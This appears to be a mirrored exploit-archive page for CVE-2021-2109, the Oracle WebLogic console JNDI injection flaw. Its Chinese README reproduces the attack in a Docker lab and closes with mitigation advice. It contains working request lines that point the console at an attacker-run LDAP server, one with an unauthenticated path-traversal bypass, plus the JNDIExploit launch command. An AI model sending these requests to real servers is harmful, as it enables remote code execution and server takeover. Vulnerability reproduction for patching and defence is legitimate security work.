CVE-2021-2109 PoC — Oracle Fusion Middleware 组件访问控制错误漏洞

Source

https://github.com/rabbitsafe/CVE-2021-2109

Associated Vulnerability

Title:Oracle Fusion Middleware 组件访问控制错误漏洞 (CVE-2021-2109)
Description:Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

Readme

CVE-2021-2109 Weblogic Server远程代码执行漏洞复现及分析

2021年1月Oracle发布了安全更新补丁，包含Oracle产品系列中的329个新安全补丁。此次公告中特别提到了，2020年11月1日发布的Oracle WebLogic Server关于CVE-2020-14750漏洞的安全公告。强烈建议客户应用此补丁更新，及此公告中的其他补丁。CVE编号CVE-2021-2109，该漏洞为Weblogic 的远程代码执行漏洞。漏洞主要由JNDI注入，导致攻击者可利用此漏洞远程代码执行。

影响版本如下：
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0

一、CVE-2021-2109 Weblogic Server远程代码执行漏洞复现

使用DOCKER搭建Weblogic Server测试环境，Weblogic Server可以正常访问
![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/1.png)

1、正常登录后台的情况下进行JNDI注入
第一种情况，需要利用管理员帐号登录Weblogic Server后台，通过BurpSuite抓取登录数据包，获取登录Cookie数据

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/2.png)

在本机启动启动LDAP，可在https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11下载，命令如下：
java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/3.png)

发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包：
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/4.png)
 
通过cmd变量执行ipconfig系统命令

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/5.png)


2、配合Weblogic Server未授权访问后台进行JNDI注入
第二种情况，不需要登录Weblogic Server后台。
需配合Weblogic Server CVE-2020-14750未授权访问漏洞，发送Weblogic Server远程代码执行漏洞CVE-2021-2109 JNDI注入POC数据包：
POST /console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/6.png)

通过cmd变量执行calc.exe，打开系统计算器

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/7.png)

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/8.png)

系统计算器被打开

![image](https://github.com/rabbitsafe/CVE-2021-2109/blob/main/9.png)


二、CVE-2021-2109 Weblogic Server远程代码执行漏洞安全建议
1、禁用T3协议
如果您不依赖T3协议进行JVM通信，可通过暂时阻断T3协议缓解此漏洞带来的影响。
1). 进入Weblogic控制台，在base_domain配置页面中，进入“安全”选项卡页面，点击“筛选器”，配置筛选器。
2). 在连接筛选器中输入：weblogic.security.net.ConnectionFilterImpl，在连接筛选器规则框中输入：* * 7001 deny t3 t3s。

2、禁止启用IIOP
登陆Weblogic控制台，找到启用IIOP选项，取消勾选，重启生效

3、临时关闭后台/console/console.portal对外访问

4、升级官方安全补丁

File Snapshot


 [4.0K]  /data/pocs/c3ab3638cc333cdf1d90deb75af946f3cd2fa7c2
├── [ 29K]  1.png
├── [ 48K]  2.png
├── [ 15K]  3.png
├── [ 92K]  4.png
├── [ 38K]  5.png
├── [ 98K]  6.png
├── [ 92K]  7.png
├── [ 98K]  8.png
├── [101K]  9.png
├── [3.4K]  README.md
└── [3.3K]  Weblogic-CVE-2021-2109.py

0 directories, 11 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!